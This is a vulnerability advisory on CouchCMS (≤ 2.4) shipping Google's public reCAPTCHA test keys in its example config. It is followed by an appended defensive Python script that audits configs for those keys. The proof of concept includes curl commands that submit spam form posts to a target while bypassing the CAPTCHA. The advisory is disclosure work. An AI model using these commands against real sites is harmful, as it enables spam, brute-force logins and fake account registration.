reCAPTCHA Bypass via Hardcoded Test Keys in CouchCMS ≤ 2.4

Title: reCAPTCHA Bypass via Hardcoded Test Keys in CouchCMS ≤ 2.4

BUG_Author: security_researcher

Affected Version: CouchCMS ≤ 2.4

Vendor: CouchCMS GitHub Repository

Software: CouchCMS

Vulnerability Files:

  • couch/config.example.php

  • couch/addons/recaptcha/recaptcha.php

Description:

  1. Hardcoded Google reCAPTCHA Test Keys:

    • In the file couch/config.example.php, the default reCAPTCHA configuration uses Google's official test keys, which always return success: true for any verification request.

    • The vulnerable code at lines 160-161:

      define( 'K_RECAPTCHA_SITE_KEY', '6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI' );
      define( 'K_RECAPTCHA_SECRET_KEY', '6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe' );

  2. Exploiting the Vulnerability:

    • These keys are Google's publicly documented test keys that bypass all CAPTCHA validation.

    • Any form protected by reCAPTCHA (contact forms, comment forms, registration forms) can be automated without solving the CAPTCHA.

    • The validation in couch/addons/recaptcha/recaptcha.php at line 82 checks $response['success'] which will always be true with test keys.

  3. Impact:

    • Automated spam submission on contact forms

    • Brute force attacks on login forms

    • Mass comment spam

    • Automated account registration

Proof of Concept:

  1. Verify the vulnerability by sending a direct API request to Google's reCAPTCHA verification endpoint:

    curl -X POST "https://www.google.com/recaptcha/api/siteverify" \
     -d "secret=6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe" \
     -d "response=any_random_string_here"

  2. The response will always return success:

    {
     "success": true,
     "challenge_ts": "2025-12-18T09:30:31Z",
     "hostname": "testkey.google.com"
    }

  3. To exploit on a CouchCMS installation with default config, submit any form with reCAPTCHA protection using any value for the g-recaptcha-response parameter:

    curl -X POST "http://<target>/contact.php" \
     -d "name=attacker" \
     -d "email=attacker@evil.com" \
     -d "message=spam_content" \
     -d "g-recaptcha-response=bypass_string"

  4. The form submission will succeed, bypassing CAPTCHA protection entirely.
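
A defender-side check for the issue described above, as an added example that is not part of the original advisory or of CouchCMS: it audits a config file for the two test keys quoted here and shows a stricter verification check that also compares the hostname field of the siteverify response. The function names, the sample config text and www.example.com are assumptions for illustration; the config is assumed to use define() lines in the form shown above.

```python
import re

# Google's publicly documented reCAPTCHA test keys, as quoted in this advisory.
TEST_SITE_KEY = "6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI"
TEST_SECRET_KEY = "6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe"
TEST_HOSTNAME = "testkey.google.com"  # hostname returned when test keys are used

DEFINE_RE = re.compile(
    r"""^\s*define\(\s*['"](K_RECAPTCHA_(?:SITE|SECRET)_KEY)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""",
    re.MULTILINE,
)

# Constructed sample input: one disabled define, two active defines with test keys.
SAMPLE_CONFIG = """<?php
// define( 'K_RECAPTCHA_SITE_KEY', 'commented-out-value' );
define( 'K_RECAPTCHA_SITE_KEY', '6LeIxAcTAAAAAJcZVRqyHh71UMIEGNQ_MXjiZKhI' );
define( 'K_RECAPTCHA_SECRET_KEY', '6LeIxAcTAAAAAGG-vFI1TnRWxMZNFuojJ4WifJWe' );
"""

def strip_php_comments(src):
    """Drop /* */ blocks and whole-line // or # comments so disabled defines are ignored."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.DOTALL)
    return re.sub(r"^\s*(//|#).*$", "", src, flags=re.MULTILINE)

def audit_config(php_source):
    """Return findings for active reCAPTCHA defines in a CouchCMS-style config."""
    findings = []
    for name, value in DEFINE_RE.findall(strip_php_comments(php_source)):
        if value in (TEST_SITE_KEY, TEST_SECRET_KEY):
            findings.append(f"{name} is set to Google's public test key")
        elif not value:
            findings.append(f"{name} is empty")
    return findings

def accept_verification(response, expected_hostname):
    """Stricter than checking success alone: the hostname must be the site's own."""
    if response.get("success") is not True:
        return False
    host = response.get("hostname", "")
    return host != TEST_HOSTNAME and host == expected_hostname

if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print("FINDING:", finding)
```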
